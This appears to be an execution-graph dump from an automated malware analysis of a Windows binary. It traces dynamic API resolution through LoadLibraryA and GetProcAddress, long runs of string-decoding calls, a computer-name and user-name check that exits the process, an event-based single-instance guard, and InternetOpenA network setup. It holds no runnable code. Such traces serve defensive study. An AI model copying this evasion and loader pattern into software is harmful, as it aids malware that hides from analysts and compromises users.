                                                                                                                                                                                                                                                                            execution_graph 89918 6caeb8ae 89919 6caeb8ba ___scrt_is_nonwritable_in_current_image 89918->89919 89920 6caeb8e3 dllmain_raw 89919->89920 89921 6caeb8de 89919->89921 89929 6caeb8c9 89919->89929 89922 6caeb8fd dllmain_crt_dispatch 89920->89922 89920->89929 89931 6cacbed0 DisableThreadLibraryCalls LoadLibraryExW 89921->89931 89922->89921 89922->89929 89924 6caeb91e 89925 6caeb94a 89924->89925 89932 6cacbed0 DisableThreadLibraryCalls LoadLibraryExW 89924->89932 89926 6caeb953 dllmain_crt_dispatch 89925->89926 89925->89929 89927 6caeb966 dllmain_raw 89926->89927 89926->89929 89927->89929 89930 6caeb936 dllmain_crt_dispatch dllmain_raw 89930->89925 89931->89924 89932->89930 89933 418490 89934 41849b 89933->89934 89963 402860 89934->89963 89942 4184b4 90065 40fe20 89942->90065 89946 4184c6 90070 40ffe0 lstrlen 89946->90070 89949 40ffe0 3 API calls 89950 4184ee 89949->89950 89951 40ffe0 3 API calls 89950->89951 89952 4184f5 89951->89952 90074 40ff00 89952->90074 89954 4184fe 89955 41851e OpenEventA 89954->89955 89956 418530 CloseHandle Sleep 89955->89956 89957 41855c 89955->89957 90238 4100c0 89956->90238 89960 418565 CreateEventA 89957->89960 89959 41854a OpenEventA 89959->89956 89959->89957 90078 417c10 89960->90078 90239 402360 LocalAlloc 89963->90239 89965 402871 89966 402360 11 API calls 89965->89966 89967 402887 89966->89967 89968 402360 11 API calls 89967->89968 89969 40289d 89968->89969 89970 402360 11 API calls 89969->89970 89971 4028b3 89970->89971 89972 402360 11 API calls 89971->89972 89973 4028c9 89972->89973 89974 402360 11 API calls 89973->89974 89975 4028df 89974->89975 89976 402360 11 API calls 89975->89976 89977 4028f8 89976->89977 89978 402360 11 API calls 89977->89978 89979 40290e 89978->89979 89980 402360 11 API calls 89979->89980 89981 402924 89980->89981 89982 402360 11 API calls 89981->89982 89983 40293a 89982->89983 89984 402360 11 API calls 89983->89984 89985 402950 89984->89985 89986 402360 11 API calls 89985->89986 89987 402966 89986->89987 89988 402360 11 API calls 89987->89988 89989 40297f 89988->89989 89990 402360 11 API calls 89989->89990 89991 402995 89990->89991 89992 402360 11 API calls 89991->89992 89993 4029ab 89992->89993 89994 402360 11 API calls 89993->89994 89995 4029c1 89994->89995 89996 402360 11 API calls 89995->89996 89997 4029d7 89996->89997 89998 402360 11 API calls 89997->89998 89999 4029ed 89998->89999 90000 402360 11 API calls 89999->90000 90001 402a06 90000->90001 90002 402360 11 API calls 90001->90002 90003 402a1c 90002->90003 90004 402360 11 API calls 90003->90004 90005 402a32 90004->90005 90006 402360 11 API calls 90005->90006 90007 402a48 90006->90007 90008 402360 11 API calls 90007->90008 90009 402a5e 90008->90009 90010 402360 11 API calls 90009->90010 90011 402a74 90010->90011 90012 402360 11 API calls 90011->90012 90013 402a8d 90012->90013 90014 402360 11 API calls 90013->90014 90015 402aa3 90014->90015 90016 402360 11 API calls 90015->90016 90017 402ab9 90016->90017 90018 402360 11 API calls 90017->90018 90019 402acf 90018->90019 90020 402360 11 API calls 90019->90020 90021 402ae5 90020->90021 90022 402360 11 API calls 90021->90022 90023 402afb 90022->90023 90024 402360 11 API calls 90023->90024 90025 402b14 90024->90025 90026 402360 11 API calls 90025->90026 90027 402b2a 90026->90027 90028 402360 11 API calls 90027->90028 90029 402b40 90028->90029 90030 402360 11 API calls 90029->90030 90031 402b56 90030->90031 90032 402360 11 API calls 90031->90032 90033 402b6c 90032->90033 90034 402360 11 API calls 90033->90034 90035 402b82 90034->90035 90036 402360 11 API calls 90035->90036 90037 402b9b 90036->90037 90038 402360 11 API calls 90037->90038 90039 402bb1 90038->90039 90040 402360 11 API calls 90039->90040 90041 402bc7 90040->90041 90042 4185a0 LoadLibraryA 90041->90042 90043 4187c7 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 90042->90043 90044 4185b8 GetProcAddress 90042->90044 90045 418828 GetProcAddress 90043->90045 90046 41883b 90043->90046 90047 4185db 20 API calls 90044->90047 90045->90046 90048 418844 GetProcAddress GetProcAddress 90046->90048 90049 41886f 90046->90049 90047->90043 90048->90049 90050 418878 GetProcAddress 90049->90050 90051 41888b 90049->90051 90050->90051 90052 418894 GetProcAddress 90051->90052 90053 4188a7 90051->90053 90052->90053 90054 4188b0 GetProcAddress GetProcAddress 90053->90054 90055 4184aa 90053->90055 90054->90055 90056 401050 90055->90056 90243 410260 GetProcessHeap HeapAlloc GetComputerNameA 90056->90243 90059 401088 90064 401090 CreateDCA GetDeviceCaps ReleaseDC 90059->90064 90060 401068 90245 410220 GetProcessHeap HeapAlloc GetUserNameA 90060->90245 90062 401074 strcmp 90062->90059 90063 401081 ExitProcess 90062->90063 90064->89942 90066 40fe30 90065->90066 90067 40fe4f 90066->90067 90068 40fe47 lstrcpy 90066->90068 90069 410220 GetProcessHeap HeapAlloc GetUserNameA 90067->90069 90068->90067 90069->89946 90072 41002f 90070->90072 90071 410057 90071->89949 90072->90071 90073 410045 lstrcpy lstrcat 90072->90073 90073->90071 90075 40ff16 90074->90075 90076 40ff46 90075->90076 90077 40ff3e lstrcpy 90075->90077 90076->89954 90077->90076 90079 417c32 90078->90079 90080 40fe20 lstrcpy 90079->90080 90081 417c44 90080->90081 90246 40feb0 lstrlen 90081->90246 90084 40feb0 2 API calls 90085 417cba 90084->90085 90250 402bd0 90085->90250 90093 417d9d 90094 40ff00 lstrcpy 90093->90094 90095 417db2 90094->90095 90096 40ff00 lstrcpy 90095->90096 90097 417dc1 90096->90097 90098 40ff00 lstrcpy 90097->90098 90099 417dd0 90098->90099 90100 40ff00 lstrcpy 90099->90100 90101 417e0f 90100->90101 90102 40ff00 lstrcpy 90101->90102 90103 417e1e 90102->90103 90973 40fe60 90103->90973 90106 40ffe0 3 API calls 90107 417e4b 90106->90107 90108 40ff00 lstrcpy 90107->90108 90109 417e5b 90108->90109 90977 40ff50 90109->90977 90112 40ff00 lstrcpy 90113 417e93 90112->90113 90114 417eaf InternetOpenA 90113->90114 90981 4100c0 90114->90981 90116 417ec6 InternetOpenA 90117 40fe60 lstrcpy 90116->90117 90118 417ef0 90117->90118 90982 402450 90118->90982 90122 417f14 90123 40fe60 lstrcpy 90122->90123 90124 417f2c 90123->90124 91004 404500 90124->91004 90126 417f36 91141 4127a0 90126->91141 90128 417f3e 90129 40fe20 lstrcpy 90128->90129 90130 417f72 90129->90130 90131 401120 lstrcpy 90130->90131 90132 417f8a 90131->90132 91161 405ce0 90132->91161 90134 417f94 91341 412150 90134->91341 90136 417f9c 90137 40fe20 lstrcpy 90136->90137 90138 417fc4 90137->90138 90139 401120 lstrcpy 90138->90139 90140 417fdc 90139->90140 90141 405ce0 41 API calls 90140->90141 90142 417fe6 90141->90142 91349 411fa0 90142->91349 90144 417fee 90145 401120 lstrcpy 90144->90145 90146 418002 90145->90146 91360 415660 90146->91360 90148 418007 90149 40fe60 lstrcpy 90148->90149 90150 418018 90149->90150 90151 40fe20 lstrcpy 90150->90151 90152 418035 90151->90152 91706 404c00 90152->91706 90154 41803e 90155 401120 lstrcpy 90154->90155 90156 41807e 90155->90156 91727 40e920 90156->91727 90238->89959 90240 402387 90239->90240 90241 4023eb strlen strlen strlen strlen 90239->90241 90242 402392 6 API calls 90240->90242 90241->89965 90242->90241 90242->90242 90244 40105b strcmp 90243->90244 90244->90059 90244->90060 90245->90062 90247 40feca 90246->90247 90248 40fef8 90247->90248 90249 40fef0 lstrcpy 90247->90249 90248->90084 90249->90248 90251 402360 11 API calls 90250->90251 90252 402be1 90251->90252 90253 402360 11 API calls 90252->90253 90254 402bf7 90253->90254 90255 402360 11 API calls 90254->90255 90256 402c0d 90255->90256 90257 402360 11 API calls 90256->90257 90258 402c23 90257->90258 90259 402360 11 API calls 90258->90259 90260 402c39 90259->90260 90261 402360 11 API calls 90260->90261 90262 402c4f 90261->90262 90263 402360 11 API calls 90262->90263 90264 402c68 90263->90264 90265 402360 11 API calls 90264->90265 90266 402c7e 90265->90266 90267 402360 11 API calls 90266->90267 90268 402c94 90267->90268 90269 402360 11 API calls 90268->90269 90270 402caa 90269->90270 90271 402360 11 API calls 90270->90271 90272 402cc0 90271->90272 90273 402360 11 API calls 90272->90273 90274 402cd6 90273->90274 90275 402360 11 API calls 90274->90275 90276 402cef 90275->90276 90277 402360 11 API calls 90276->90277 90278 402d05 90277->90278 90279 402360 11 API calls 90278->90279 90280 402d1b 90279->90280 90281 402360 11 API calls 90280->90281 90282 402d31 90281->90282 90283 402360 11 API calls 90282->90283 90284 402d47 90283->90284 90285 402360 11 API calls 90284->90285 90286 402d5d 90285->90286 90287 402360 11 API calls 90286->90287 90288 402d76 90287->90288 90289 402360 11 API calls 90288->90289 90290 402d8c 90289->90290 90291 402360 11 API calls 90290->90291 90292 402da2 90291->90292 90293 402360 11 API calls 90292->90293 90294 402db8 90293->90294 90295 402360 11 API calls 90294->90295 90296 402dce 90295->90296 90297 402360 11 API calls 90296->90297 90298 402de4 90297->90298 90299 402360 11 API calls 90298->90299 90300 402dfd 90299->90300 90301 402360 11 API calls 90300->90301 90302 402e13 90301->90302 90303 402360 11 API calls 90302->90303 90304 402e29 90303->90304 90305 402360 11 API calls 90304->90305 90306 402e3f 90305->90306 90307 402360 11 API calls 90306->90307 90308 402e55 90307->90308 90309 402360 11 API calls 90308->90309 90310 402e6b 90309->90310 90311 402360 11 API calls 90310->90311 90312 402e84 90311->90312 90313 402360 11 API calls 90312->90313 90314 402e9a 90313->90314 90315 402360 11 API calls 90314->90315 90316 402eb0 90315->90316 90317 402360 11 API calls 90316->90317 90318 402ec6 90317->90318 90319 402360 11 API calls 90318->90319 90320 402edc 90319->90320 90321 402360 11 API calls 90320->90321 90322 402ef2 90321->90322 90323 402360 11 API calls 90322->90323 90324 402f0b 90323->90324 90325 402360 11 API calls 90324->90325 90326 402f21 90325->90326 90327 402360 11 API calls 90326->90327 90328 402f37 90327->90328 90329 402360 11 API calls 90328->90329 90330 402f4d 90329->90330 90331 402360 11 API calls 90330->90331 90332 402f63 90331->90332 90333 402360 11 API calls 90332->90333 90334 402f79 90333->90334 90335 402360 11 API calls 90334->90335 90336 402f92 90335->90336 90337 402360 11 API calls 90336->90337 90338 402fa8 90337->90338 90339 402360 11 API calls 90338->90339 90340 402fbe 90339->90340 90341 402360 11 API calls 90340->90341 90342 402fd4 90341->90342 90343 402360 11 API calls 90342->90343 90344 402fea 90343->90344 90345 402360 11 API calls 90344->90345 90346 403000 90345->90346 90347 402360 11 API calls 90346->90347 90348 403019 90347->90348 90349 402360 11 API calls 90348->90349 90350 40302f 90349->90350 90351 402360 11 API calls 90350->90351 90352 403045 90351->90352 90353 402360 11 API calls 90352->90353 90354 40305b 90353->90354 90355 402360 11 API calls 90354->90355 90356 403071 90355->90356 90357 402360 11 API calls 90356->90357 90358 403087 90357->90358 90359 402360 11 API calls 90358->90359 90360 4030a0 90359->90360 90361 402360 11 API calls 90360->90361 90362 4030b6 90361->90362 90363 402360 11 API calls 90362->90363 90364 4030cc 90363->90364 90365 402360 11 API calls 90364->90365 90366 4030e2 90365->90366 90367 402360 11 API calls 90366->90367 90368 4030f8 90367->90368 90369 402360 11 API calls 90368->90369 90370 40310e 90369->90370 90371 402360 11 API calls 90370->90371 90372 403127 90371->90372 90373 402360 11 API calls 90372->90373 90374 40313d 90373->90374 90375 402360 11 API calls 90374->90375 90376 403153 90375->90376 90377 402360 11 API calls 90376->90377 90378 403169 90377->90378 90379 402360 11 API calls 90378->90379 90380 40317f 90379->90380 90381 402360 11 API calls 90380->90381 90382 403195 90381->90382 90383 402360 11 API calls 90382->90383 90384 4031ae 90383->90384 90385 402360 11 API calls 90384->90385 90386 4031c4 90385->90386 90387 402360 11 API calls 90386->90387 90388 4031da 90387->90388 90389 402360 11 API calls 90388->90389 90390 4031f0 90389->90390 90391 402360 11 API calls 90390->90391 90392 403206 90391->90392 90393 402360 11 API calls 90392->90393 90394 40321c 90393->90394 90395 402360 11 API calls 90394->90395 90396 403235 90395->90396 90397 402360 11 API calls 90396->90397 90398 40324b 90397->90398 90399 402360 11 API calls 90398->90399 90400 403261 90399->90400 90401 402360 11 API calls 90400->90401 90402 403277 90401->90402 90403 402360 11 API calls 90402->90403 90404 40328d 90403->90404 90405 402360 11 API calls 90404->90405 90406 4032a3 90405->90406 90407 402360 11 API calls 90406->90407 90408 4032bc 90407->90408 90409 402360 11 API calls 90408->90409 90410 4032d2 90409->90410 90411 402360 11 API calls 90410->90411 90412 4032e8 90411->90412 90413 402360 11 API calls 90412->90413 90414 4032fe 90413->90414 90415 402360 11 API calls 90414->90415 90416 403314 90415->90416 90417 402360 11 API calls 90416->90417 90418 40332a 90417->90418 90419 402360 11 API calls 90418->90419 90420 403343 90419->90420 90421 402360 11 API calls 90420->90421 90422 403359 90421->90422 90423 402360 11 API calls 90422->90423 90424 40336f 90423->90424 90425 402360 11 API calls 90424->90425 90426 403385 90425->90426 90427 402360 11 API calls 90426->90427 90428 40339b 90427->90428 90429 402360 11 API calls 90428->90429 90430 4033b1 90429->90430 90431 402360 11 API calls 90430->90431 90432 4033ca 90431->90432 90433 402360 11 API calls 90432->90433 90434 4033e0 90433->90434 90435 402360 11 API calls 90434->90435 90436 4033f6 90435->90436 90437 402360 11 API calls 90436->90437 90438 40340c 90437->90438 90439 402360 11 API calls 90438->90439 90440 403422 90439->90440 90441 402360 11 API calls 90440->90441 90442 403438 90441->90442 90443 402360 11 API calls 90442->90443 90444 403451 90443->90444 90445 402360 11 API calls 90444->90445 90446 403467 90445->90446 90447 402360 11 API calls 90446->90447 90448 40347d 90447->90448 90449 402360 11 API calls 90448->90449 90450 403493 90449->90450 90451 402360 11 API calls 90450->90451 90452 4034a9 90451->90452 90453 402360 11 API calls 90452->90453 90454 4034bf 90453->90454 90455 402360 11 API calls 90454->90455 90456 4034d8 90455->90456 90457 402360 11 API calls 90456->90457 90458 4034ee 90457->90458 90459 402360 11 API calls 90458->90459 90460 403504 90459->90460 90461 402360 11 API calls 90460->90461 90462 40351a 90461->90462 90463 402360 11 API calls 90462->90463 90464 403530 90463->90464 90465 402360 11 API calls 90464->90465 90466 403546 90465->90466 90467 402360 11 API calls 90466->90467 90468 40355f 90467->90468 90469 402360 11 API calls 90468->90469 90470 403575 90469->90470 90471 402360 11 API calls 90470->90471 90472 40358b 90471->90472 90473 402360 11 API calls 90472->90473 90474 4035a1 90473->90474 90475 402360 11 API calls 90474->90475 90476 4035b7 90475->90476 90477 402360 11 API calls 90476->90477 90478 4035cd 90477->90478 90479 402360 11 API calls 90478->90479 90480 4035e6 90479->90480 90481 402360 11 API calls 90480->90481 90482 4035fc 90481->90482 90483 402360 11 API calls 90482->90483 90484 403612 90483->90484 90485 402360 11 API calls 90484->90485 90486 403628 90485->90486 90487 402360 11 API calls 90486->90487 90488 40363e 90487->90488 90489 402360 11 API calls 90488->90489 90490 403654 90489->90490 90491 402360 11 API calls 90490->90491 90492 40366d 90491->90492 90493 402360 11 API calls 90492->90493 90494 403683 90493->90494 90495 402360 11 API calls 90494->90495 90496 403699 90495->90496 90497 402360 11 API calls 90496->90497 90498 4036af 90497->90498 90499 402360 11 API calls 90498->90499 90500 4036c5 90499->90500 90501 402360 11 API calls 90500->90501 90502 4036db 90501->90502 90503 402360 11 API calls 90502->90503 90504 4036f4 90503->90504 90505 402360 11 API calls 90504->90505 90506 40370a 90505->90506 90507 402360 11 API calls 90506->90507 90508 403720 90507->90508 90509 402360 11 API calls 90508->90509 90510 403736 90509->90510 90511 402360 11 API calls 90510->90511 90512 40374c 90511->90512 90513 402360 11 API calls 90512->90513 90514 403762 90513->90514 90515 402360 11 API calls 90514->90515 90516 40377b 90515->90516 90517 402360 11 API calls 90516->90517 90518 403791 90517->90518 90519 402360 11 API calls 90518->90519 90520 4037a7 90519->90520 90521 402360 11 API calls 90520->90521 90522 4037bd 90521->90522 90523 402360 11 API calls 90522->90523 90524 4037d3 90523->90524 90525 402360 11 API calls 90524->90525 90526 4037e9 90525->90526 90527 402360 11 API calls 90526->90527 90528 403802 90527->90528 90529 402360 11 API calls 90528->90529 90530 403818 90529->90530 90531 402360 11 API calls 90530->90531 90532 40382e 90531->90532 90533 402360 11 API calls 90532->90533 90534 403844 90533->90534 90535 402360 11 API calls 90534->90535 90536 40385a 90535->90536 90537 402360 11 API calls 90536->90537 90538 403870 90537->90538 90539 402360 11 API calls 90538->90539 90540 403889 90539->90540 90541 402360 11 API calls 90540->90541 90542 40389f 90541->90542 90543 402360 11 API calls 90542->90543 90544 4038b5 90543->90544 90545 402360 11 API calls 90544->90545 90546 4038cb 90545->90546 90547 402360 11 API calls 90546->90547 90548 4038e1 90547->90548 90549 402360 11 API calls 90548->90549 90550 4038f7 90549->90550 90551 402360 11 API calls 90550->90551 90552 403910 90551->90552 90553 402360 11 API calls 90552->90553 90554 403926 90553->90554 90555 402360 11 API calls 90554->90555 90556 40393c 90555->90556 90557 402360 11 API calls 90556->90557 90558 403952 90557->90558 90559 402360 11 API calls 90558->90559 90560 403968 90559->90560 90561 402360 11 API calls 90560->90561 90562 40397e 90561->90562 90563 402360 11 API calls 90562->90563 90564 403997 90563->90564 90565 402360 11 API calls 90564->90565 90566 4039ad 90565->90566 90567 402360 11 API calls 90566->90567 90568 4039c3 90567->90568 90569 402360 11 API calls 90568->90569 90570 4039d9 90569->90570 90571 402360 11 API calls 90570->90571 90572 4039ef 90571->90572 90573 402360 11 API calls 90572->90573 90574 403a05 90573->90574 90575 402360 11 API calls 90574->90575 90576 403a1e 90575->90576 90577 402360 11 API calls 90576->90577 90578 403a34 90577->90578 90579 402360 11 API calls 90578->90579 90580 403a4a 90579->90580 90581 402360 11 API calls 90580->90581 90582 403a60 90581->90582 90583 402360 11 API calls 90582->90583 90584 403a76 90583->90584 90585 402360 11 API calls 90584->90585 90586 403a8c 90585->90586 90587 402360 11 API calls 90586->90587 90588 403aa5 90587->90588 90589 402360 11 API calls 90588->90589 90590 403abb 90589->90590 90591 402360 11 API calls 90590->90591 90592 403ad1 90591->90592 90593 402360 11 API calls 90592->90593 90594 403ae7 90593->90594 90595 402360 11 API calls 90594->90595 90596 403afd 90595->90596 90597 402360 11 API calls 90596->90597 90598 403b13 90597->90598 90599 402360 11 API calls 90598->90599 90600 403b2c 90599->90600 90601 402360 11 API calls 90600->90601 90602 403b42 90601->90602 90603 402360 11 API calls 90602->90603 90604 403b58 90603->90604 90605 402360 11 API calls 90604->90605 90606 403b6e 90605->90606 90607 402360 11 API calls 90606->90607 90608 403b84 90607->90608 90609 402360 11 API calls 90608->90609 90610 403b9a 90609->90610 90611 402360 11 API calls 90610->90611 90612 403bb3 90611->90612 90613 402360 11 API calls 90612->90613 90614 403bc9 90613->90614 90615 402360 11 API calls 90614->90615 90616 403bdf 90615->90616 90617 402360 11 API calls 90616->90617 90618 403bf5 90617->90618 90619 402360 11 API calls 90618->90619 90620 403c0b 90619->90620 90621 402360 11 API calls 90620->90621 90622 403c21 90621->90622 90623 402360 11 API calls 90622->90623 90624 403c3a 90623->90624 90625 402360 11 API calls 90624->90625 90626 403c50 90625->90626 90627 402360 11 API calls 90626->90627 90628 403c66 90627->90628 90629 402360 11 API calls 90628->90629 90630 403c7c 90629->90630 90631 402360 11 API calls 90630->90631 90632 403c92 90631->90632 90633 402360 11 API calls 90632->90633 90634 403ca8 90633->90634 90635 402360 11 API calls 90634->90635 90636 403cc1 90635->90636 90637 402360 11 API calls 90636->90637 90638 403cd7 90637->90638 90639 402360 11 API calls 90638->90639 90640 403ced 90639->90640 90641 402360 11 API calls 90640->90641 90642 403d03 90641->90642 90643 402360 11 API calls 90642->90643 90644 403d19 90643->90644 90645 402360 11 API calls 90644->90645 90646 403d2f 90645->90646 90647 402360 11 API calls 90646->90647 90648 403d48 90647->90648 90649 402360 11 API calls 90648->90649 90650 403d5e 90649->90650 90651 402360 11 API calls 90650->90651 90652 403d74 90651->90652 90653 402360 11 API calls 90652->90653 90654 403d8a 90653->90654 90655 402360 11 API calls 90654->90655 90656 403da0 90655->90656 90657 402360 11 API calls 90656->90657 90658 403db6 90657->90658 90659 402360 11 API calls 90658->90659 90660 403dcf 90659->90660 90661 402360 11 API calls 90660->90661 90662 403de5 90661->90662 90663 402360 11 API calls 90662->90663 90664 403dfb 90663->90664 90665 402360 11 API calls 90664->90665 90666 403e11 90665->90666 90667 402360 11 API calls 90666->90667 90668 403e27 90667->90668 90669 402360 11 API calls 90668->90669 90670 403e3d 90669->90670 90671 402360 11 API calls 90670->90671 90672 403e56 90671->90672 90673 402360 11 API calls 90672->90673 90674 403e6c 90673->90674 90675 402360 11 API calls 90674->90675 90676 403e82 90675->90676 90677 402360 11 API calls 90676->90677 90678 403e98 90677->90678 90679 402360 11 API calls 90678->90679 90680 403eae 90679->90680 90681 402360 11 API calls 90680->90681 90682 403ec4 90681->90682 90683 402360 11 API calls 90682->90683 90684 403edd 90683->90684 90685 402360 11 API calls 90684->90685 90686 403ef3 90685->90686 90687 402360 11 API calls 90686->90687 90688 403f09 90687->90688 90689 402360 11 API calls 90688->90689 90690 403f1f 90689->90690 90691 402360 11 API calls 90690->90691 90692 403f35 90691->90692 90693 402360 11 API calls 90692->90693 90694 403f4b 90693->90694 90695 402360 11 API calls 90694->90695 90696 403f64 90695->90696 90697 402360 11 API calls 90696->90697 90698 403f7a 90697->90698 90699 402360 11 API calls 90698->90699 90700 403f90 90699->90700 90701 402360 11 API calls 90700->90701 90702 403fa6 90701->90702 90703 402360 11 API calls 90702->90703 90704 403fbc 90703->90704 90705 402360 11 API calls 90704->90705 90706 403fd2 90705->90706 90707 402360 11 API calls 90706->90707 90708 403feb 90707->90708 90709 402360 11 API calls 90708->90709 90710 404001 90709->90710 90711 402360 11 API calls 90710->90711 90712 404017 90711->90712 90713 402360 11 API calls 90712->90713 90714 40402d 90713->90714 90715 402360 11 API calls 90714->90715 90716 404043 90715->90716 90717 402360 11 API calls 90716->90717 90718 404059 90717->90718 90719 402360 11 API calls 90718->90719 90720 404072 90719->90720 90721 402360 11 API calls 90720->90721 90722 404088 90721->90722 90723 402360 11 API calls 90722->90723 90724 40409e 90723->90724 90725 402360 11 API calls 90724->90725 90726 4040b4 90725->90726 90727 402360 11 API calls 90726->90727 90728 4040ca 90727->90728 90729 402360 11 API calls 90728->90729 90730 4040e0 90729->90730 90731 402360 11 API calls 90730->90731 90732 4040f9 90731->90732 90733 402360 11 API calls 90732->90733 90734 40410f 90733->90734 90735 402360 11 API calls 90734->90735 90736 404125 90735->90736 90737 402360 11 API calls 90736->90737 90738 40413b 90737->90738 90739 402360 11 API calls 90738->90739 90740 404151 90739->90740 90741 402360 11 API calls 90740->90741 90742 404167 90741->90742 90743 402360 11 API calls 90742->90743 90744 404180 90743->90744 90745 402360 11 API calls 90744->90745 90746 404196 90745->90746 90747 402360 11 API calls 90746->90747 90748 4041ac 90747->90748 90749 402360 11 API calls 90748->90749 90750 4041c2 90749->90750 90751 402360 11 API calls 90750->90751 90752 4041d8 90751->90752 90753 402360 11 API calls 90752->90753 90754 4041ee 90753->90754 90755 402360 11 API calls 90754->90755 90756 404207 90755->90756 90757 402360 11 API calls 90756->90757 90758 40421d 90757->90758 90759 402360 11 API calls 90758->90759 90760 404233 90759->90760 90761 402360 11 API calls 90760->90761 90762 404249 90761->90762 90763 402360 11 API calls 90762->90763 90764 40425f 90763->90764 90765 402360 11 API calls 90764->90765 90766 404275 90765->90766 90767 402360 11 API calls 90766->90767 90768 40428e 90767->90768 90769 402360 11 API calls 90768->90769 90770 4042a4 90769->90770 90771 402360 11 API calls 90770->90771 90772 4042ba 90771->90772 90773 402360 11 API calls 90772->90773 90774 4042d0 90773->90774 90775 402360 11 API calls 90774->90775 90776 4042e6 90775->90776 90777 402360 11 API calls 90776->90777 90778 4042fc 90777->90778 90779 402360 11 API calls 90778->90779 90780 404315 90779->90780 90781 402360 11 API calls 90780->90781 90782 40432b 90781->90782 90783 402360 11 API calls 90782->90783 90784 404341 90783->90784 90785 402360 11 API calls 90784->90785 90786 404357 90785->90786 90787 402360 11 API calls 90786->90787 90788 40436d 90787->90788 90789 402360 11 API calls 90788->90789 90790 404383 90789->90790 90791 402360 11 API calls 90790->90791 90792 40439c 90791->90792 90793 402360 11 API calls 90792->90793 90794 4043b2 90793->90794 90795 402360 11 API calls 90794->90795 90796 4043c8 90795->90796 90797 402360 11 API calls 90796->90797 90798 4043de 90797->90798 90799 402360 11 API calls 90798->90799 90800 4043f4 90799->90800 90801 402360 11 API calls 90800->90801 90802 40440a 90801->90802 90803 402360 11 API calls 90802->90803 90804 404423 90803->90804 90805 4188e0 90804->90805 90806 4188ed 43 API calls 90805->90806 90807 418cfe 9 API calls 90805->90807 90806->90807 90808 418da4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 90807->90808 90809 418e18 90807->90809 90808->90809 90810 418ee2 90809->90810 90811 418e25 8 API calls 90809->90811 90812 418eeb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 90810->90812 90813 418f5f 90810->90813 90811->90810 90812->90813 90814 418ff9 90813->90814 90815 418f6c 6 API calls 90813->90815 90816 419006 9 API calls 90814->90816 90817 4190dc 90814->90817 90815->90814 90816->90817 90818 4190e5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 90817->90818 90819 419159 90817->90819 90818->90819 90820 419162 GetProcAddress GetProcAddress 90819->90820 90821 41918d 90819->90821 90820->90821 90822 4191c1 90821->90822 90823 419196 GetProcAddress GetProcAddress 90821->90823 90824 4192b9 90822->90824 90825 4191ce 10 API calls 90822->90825 90823->90822 90826 4192c2 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 90824->90826 90827 41931e 90824->90827 90825->90824 90826->90827 90828 419327 GetProcAddress 90827->90828 90829 41933a 90827->90829 90828->90829 90830 419343 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 90829->90830 90831 41939f 90829->90831 90830->90831 90832 417d7d 90831->90832 90833 4193a8 GetProcAddress 90831->90833 90834 401120 90832->90834 90833->90832 90835 40fe60 lstrcpy 90834->90835 90836 401149 90835->90836 90837 40fe60 lstrcpy 90836->90837 90838 40115c 90837->90838 90839 40fe60 lstrcpy 90838->90839 90840 401178 90839->90840 90841 414330 90840->90841 90842 414368 90841->90842 90843 40feb0 2 API calls 90842->90843 90844 414391 90843->90844 90845 40feb0 2 API calls 90844->90845 90846 41439e 90845->90846 90847 40feb0 2 API calls 90846->90847 90848 4143ab 90847->90848 90849 40fe20 lstrcpy 90848->90849 90850 4143b8 90849->90850 90851 40fe20 lstrcpy 90850->90851 90852 4143c9 90851->90852 90853 40fe20 lstrcpy 90852->90853 90854 4143da 90853->90854 90855 40fe20 lstrcpy 90854->90855 90856 4143ee 90855->90856 90857 40fe20 lstrcpy 90856->90857 90858 4143ff 90857->90858 90859 40fe20 lstrcpy 90858->90859 90945 414413 90859->90945 90860 402480 lstrcpy 90860->90945 90862 40fe60 lstrcpy 90862->90945 90863 414637 StrCmpCA 90863->90945 90864 4024e0 lstrcpy 90864->90945 90865 4146cc StrCmpCA 90866 4152a6 90865->90866 90865->90945 90867 40ff00 lstrcpy 90866->90867 90868 4152b2 90867->90868 91956 4024e0 90868->91956 90871 40ff00 lstrcpy 90873 4152cb 90871->90873 90872 41489f StrCmpCA 90874 415197 90872->90874 90872->90945 91959 402770 lstrcpy 90873->91959 90875 40ff00 lstrcpy 90874->90875 90876 4151a3 90875->90876 91954 402570 lstrcpy 90876->91954 90880 4152df 90883 40ff00 lstrcpy 90880->90883 90881 4151ac 90884 40ff00 lstrcpy 90881->90884 90882 414a8b StrCmpCA 90885 415085 90882->90885 90882->90945 90886 4152ef 90883->90886 90887 4151bc 90884->90887 90888 40ff00 lstrcpy 90885->90888 90892 40fe60 lstrcpy 90886->90892 91955 4027a0 lstrcpy 90887->91955 90891 415094 90888->90891 90889 402570 lstrcpy 90889->90945 90890 4025a0 lstrcpy 90890->90945 91952 402600 lstrcpy 90891->91952 90896 415308 90892->90896 90900 40fe60 lstrcpy 90896->90900 90897 4151d0 90901 40ff00 lstrcpy 90897->90901 90898 41509d 90902 40ff00 lstrcpy 90898->90902 90899 414c5e StrCmpCA 90904 414f70 90899->90904 90899->90945 90905 415318 90900->90905 90906 4151e0 90901->90906 90907 4150ad 90902->90907 90903 402510 lstrcpy 90903->90945 90909 40ff00 lstrcpy 90904->90909 90908 40fe60 lstrcpy 90905->90908 90915 40fe60 lstrcpy 90906->90915 91953 4027d0 lstrcpy 90907->91953 90921 414ee3 90908->90921 90912 414f7c 90909->90912 90910 402600 lstrcpy 90910->90945 90911 413b80 29 API calls 90911->90945 91950 402690 lstrcpy 90912->91950 90913 41480a StrCmpCA 90913->90945 90918 4151f9 90915->90918 90922 40fe60 lstrcpy 90918->90922 90919 4150c1 90923 40ff00 lstrcpy 90919->90923 90920 414f85 90925 40ff00 lstrcpy 90920->90925 90921->90093 90926 415209 90922->90926 90927 4150d1 90923->90927 90924 414e3d StrCmpCA 90928 414e58 90924->90928 90929 414e48 Sleep 90924->90929 90930 414f95 90925->90930 90934 40fe60 lstrcpy 90926->90934 90939 40fe60 lstrcpy 90927->90939 90933 40ff00 lstrcpy 90928->90933 90929->90945 91951 402800 lstrcpy 90930->91951 90931 402690 lstrcpy 90931->90945 90932 4026c0 lstrcpy 90932->90945 90936 414e67 90933->90936 90934->90921 90935 4149e9 StrCmpCA 90935->90945 91948 402720 lstrcpy 90936->91948 90943 4150ea 90939->90943 90941 413a40 24 API calls 90941->90945 90942 414fac 90946 40ff00 lstrcpy 90942->90946 90948 40fe60 lstrcpy 90943->90948 90944 414e70 90949 40ff00 